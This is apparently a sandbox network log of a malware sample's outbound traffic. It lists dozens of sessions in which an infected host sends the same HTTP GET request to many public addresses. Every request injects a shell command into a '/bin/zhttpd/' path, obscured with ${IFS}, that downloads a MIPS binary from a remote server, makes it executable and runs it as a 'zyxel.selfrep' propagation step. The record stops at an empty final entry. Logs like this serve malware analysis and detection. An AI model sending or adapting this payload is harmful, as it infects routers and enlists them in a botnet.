                                                494192.168.2.235664261.138.183.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587141037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                495192.168.2.2357352160.241.18.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587141037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                496192.168.2.2334602157.86.167.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587173939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                497192.168.2.233660276.44.160.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587208033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                498192.168.2.235838677.72.181.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587236881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                499192.168.2.2348760222.131.148.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587260962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                500192.168.2.2349202111.12.212.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587296009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                501192.168.2.2350036209.232.219.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587316036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                502192.168.2.233583892.163.3.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587343931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                503192.168.2.2337784113.35.118.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587359905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                504192.168.2.2347548106.143.251.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587392092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                505192.168.2.235230837.232.12.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587440968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                506192.168.2.235825077.92.51.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587440968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                507192.168.2.2351144132.166.174.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587481022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                508192.168.2.2333774123.19.25.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587536097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                509192.168.2.2359156140.73.249.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587539911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                510192.168.2.2353496181.108.150.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587558985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                511192.168.2.2357320111.135.244.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587568045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                512192.168.2.2338704119.74.12.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587578058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                513192.168.2.235137869.93.135.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587599993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                514192.168.2.2344046180.49.108.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587652922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                515192.168.2.2342198151.167.51.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587672949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                516192.168.2.2340724178.177.48.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587723970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                517192.168.2.2340698185.205.207.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587738037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                518192.168.2.2340326143.35.228.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587754965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                519192.168.2.2336930143.41.232.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587779045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                520192.168.2.2338184212.196.25.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587806940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                521192.168.2.2341744192.5.133.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587850094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                522192.168.2.235725048.212.163.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587872982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                523192.168.2.234392832.81.63.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587877035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                524192.168.2.23379648.194.193.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.587910891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                525192.168.2.2344354169.128.80.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588005066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                526192.168.2.233546463.87.180.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588009119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                527192.168.2.235037459.73.67.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588009119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                528192.168.2.2335402213.81.3.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588027000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                529192.168.2.2360542170.116.182.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588057995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                530192.168.2.2354634209.180.25.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588067055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                531192.168.2.235947292.151.252.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588124037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                532192.168.2.23513149.233.246.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588155985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                533192.168.2.2359942136.203.94.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588196993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                534192.168.2.234673283.158.48.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588211060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                535192.168.2.233761861.120.3.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588243961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                536192.168.2.2352902162.35.182.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588248968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                537192.168.2.233655844.35.248.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588274956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                538192.168.2.2360822132.227.142.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588288069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                539192.168.2.2358850175.249.65.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588315964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                540192.168.2.2352888149.112.246.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588327885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                541192.168.2.234269234.145.127.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588365078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                542192.168.2.2349632116.23.44.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588397980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                543192.168.2.233956463.238.234.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588402033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                544192.168.2.2358660167.241.186.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588448048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                545192.168.2.2340870187.163.228.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588470936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                546192.168.2.2357496111.206.194.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588515997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                547192.168.2.2360984134.125.61.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588529110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                548192.168.2.2352688156.63.116.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588577032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                549192.168.2.2344896218.145.10.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588592052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                550192.168.2.235615280.228.28.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588608027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                551192.168.2.2337034163.32.148.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588629961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                552192.168.2.2348956138.123.89.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588663101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                553192.168.2.2359744102.33.200.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588674068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                554192.168.2.2333948171.253.197.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588680983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                555192.168.2.2344608153.46.113.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588728905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                556192.168.2.233735620.83.131.70443
                                                TimestampBytes transferredDirectionData
